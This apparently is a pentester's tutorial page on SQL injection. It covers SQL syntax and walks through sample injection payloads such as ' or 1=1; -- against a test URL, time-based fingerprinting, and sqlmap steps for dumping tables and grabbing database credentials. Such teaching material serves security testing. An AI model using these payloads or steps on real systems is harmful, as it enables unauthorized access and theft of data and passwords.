SQL Injection
Last updated
Last updated
Common SQL Statement verbs
SELECT - Retrieves data from a table
INSERT - Adds data to a table
DELETE - Removes data from a data
UPDATE - Modifies data in a table
DROP - Delete a table
UNION - Combines data from multiple queries
SQL Query Modifiers
WHERE
AND/OR
LIMIT #1, #2
ORDER BY #
Special Characters
' and " - string delimiters
--, /*, and # - comment delimiters
*and % - comment delimiters
; - Ends SQL statement
=
When attempting a SQL injection, we ideally want to input data that will cause a syntax error, then try to get normal result with additional characters, then we can input verbs or modifiers knowing it will run.
Sample server side code
Normal input: Defender
URL: http://test.com/sqli.php?name=Defender
SQL Query:
SELECT *
FROM Users
WHERE lname='Defender';
Results: Normal result
Injected Input: Defender'
URL: http://test.com/sqli.php?name=Defender'
SQL Query:
SELECT *
FROM Users
WHERE lname='Defender'';
Results: ' causes syntax error
Injected Input: Defender'; --
URL: http://test.com/sqli.php?name=Defender'; --
SQL Query:
SELECT *
FROM Users
WHERE lname='Defender''; --;
Results: Returns normal result
Injected Input: Defender' or 1=1; --
URL: http://test.com/sqli.php?name=Defender' or 1=1; --
SQL Query:
SELECT *
FROM Users
WHERE lname='Defender' or 1=1; --;
Results: Return all rows from Users table
If commenting -- does not work. We can alternatively use string statements. Example Injection: Defender' OR 'a'='a .Example Statement: SELECT...WHERE lname='Defender' OR 'a'='a'; .
INSERT and UNION statment require number of columns required or used
INSERT and UNION statements require data type associated with columns to match
DB Fingerprinting
Test by sending input of test ' {sleep 10} then {sleep 20}. And see if server takes time to respond back.
Cheat Sheet
Displayed full SQL query as a value
Tools
SQLMAP
Open-source, python-based command line SQL injection tool created by Bernardo Damele A. G. (@#inquisdb)
See sqlmap extended help
Test for vulnerability
Lists Database
With found database, lets list the tables
With found tables, list all columns
Dump all records on a table
Search all columns for a string (Example "pass")
Per found table and columns, dump information of query
Within a pentest you don't want to dump sensitive information as it gets cached on your machine, instead of
--dumpyou can use--countto see amount of entries, then--dump --start=1 --stop=3
Alternatively, dump 38th entry
Grab user and password on database management system (Used to administer DB)
HUGE SQL injection cheat sheet: https://www.websec.ca/kb/sql_injection
NetSPI SQL injection wiki: https://sqlwiki.netspi.com/
Time-based Blind SQL Injection: https://www.sqlinjection.net/time-based/
OWASP Blind SQL injection: https://owasp.org/www-community/attacks/Blind_SQL_Injection
NoSQL injections: https://medium.com/bugbountywriteup/nosql-injection-8732c2140576
swisskyrepo's guide to NoSQL Injections: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection
Understanding GraphQL SQL Schemas and Types: https://graphql.org/learn/schema/
by3bl33d3r's MS SQL command Reference https://github.com/byt3bl33d3r/CrackMapExec/wiki/MSSQL-Command-Reference
